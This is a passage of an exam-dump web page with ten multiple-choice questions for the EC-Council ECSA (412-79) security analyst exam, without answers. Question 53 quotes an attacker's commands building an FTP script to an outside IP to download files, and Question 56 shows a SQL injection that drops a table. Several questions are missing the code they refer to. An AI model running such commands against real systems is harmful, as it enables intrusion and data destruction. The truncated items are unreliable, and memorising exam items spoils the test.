412-79 Exam Details

  • Exam Code
    :412-79
  • Exam Name
    :EC-Council Certified Security Analyst (ECSA)
  • Certification
    :EC-COUNCIL Certifications
  • Vendor
    :EC-COUNCIL
  • Total Questions
    :232 Q&As
  • Last Updated
    :Jul 10, 2026

EC-COUNCIL 412-79 Online Questions & Answers

  • Question 51:

    What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?

    A. A compressed file
    B. A Data stream file
    C. An encrypted file
    D. A reserved file

  • Question 52:

    During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore you report this evidence. This type of evidence is known as:

    A. Inculpatory evidence
    B. mandatory evidence
    C. exculpatory evidence
    D. Terrible evidence

  • Question 53:

    The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

    “cmd1.exe /c open 213.116.251.162 >ftpcom”

    “cmd1.exe /c echo johna2k >>ftpcom”

    “cmd1.exe /c echo

    haxedj00 >>ftpcom”

    “cmd1.exe /c echo get n

    A. It is a local exploit where the attacker logs in using username johna2k
    B. There are two attackers on the system -johna2k and haxedj00
    C. The attack is a remote exploit and the hacker downloads three files
    D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

  • Question 54:

    What is the following command trying to accomplish?

    A. Verify that TCP port 445 is open for the 192.168.0.0 network
    B. Verify that UDP port 445 is open for the 192.168.0.0 network
    C. Verify that UDP port 445 is closed for the 192.168.0.0 network
    D. Verify that NETBIOS is running for the 192.168.0.0 network

  • Question 55:

    Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?

    A. 18 U.S.C. 1029 Possession of Access Devices
    B. 18 U.S.C. 1030 Fraud and related activity in connection with computers
    C. 18 U.S.C. 1343 Fraud by wire, radio or television
    D. 18 U.S.C. 1361 Injury to Government Property
    E. 18 U.S.C. 1362 Government communication systems
    F. 18 U.S.C. 1832 Trade Secrets Act

  • Question 56:

    What will the following command produce on a website login page?

    SELECT email, passwd, login_id, full_name FROM members WHERE email = '[email protected]'; DROP TABLE members; --'

    A. Inserts the Error! Reference source not found. email address into the members table
    B. Retrieves the password for the first user in the members table
    C. Deletes the entire members table
    D. This command will not produce anything since the syntax is incorrect

  • Question 57:

    What are the security risks of running a "repair" installation for Windows XP?

    A. There are no security risks when running the "repair" installation for Windows XP
    B. Pressing Shift+F1 gives the user administrative rights
    C. Pressing Ctrl+F10 gives the user administrative rights
    D. Pressing Shift+F10 gives the user administrative rights

  • Question 58:

    You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web

    security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities:

    When you type this and click on search, you receive a pop-up window that says:

    "This is a test."

    What is the result of this test?

    A. Your website is vulnerable to CSS
    B. Your website is not vulnerable
    C. Your website is vulnerable to SQL injection
    D. Your website is vulnerable to web bugs

  • Question 59:

    After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?

    A. Statefull firewalls do not work with packet filtering firewalls
    B. NAT does not work with statefull firewalls
    C. NAT does not work with IPSEC
    D. IPSEC does not work with packet filtering firewalls

  • Question 60:

    What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?

    A. ICMP header field
    B. TCP header field
    C. IP header field
    D. UDP header field

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 412-79 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.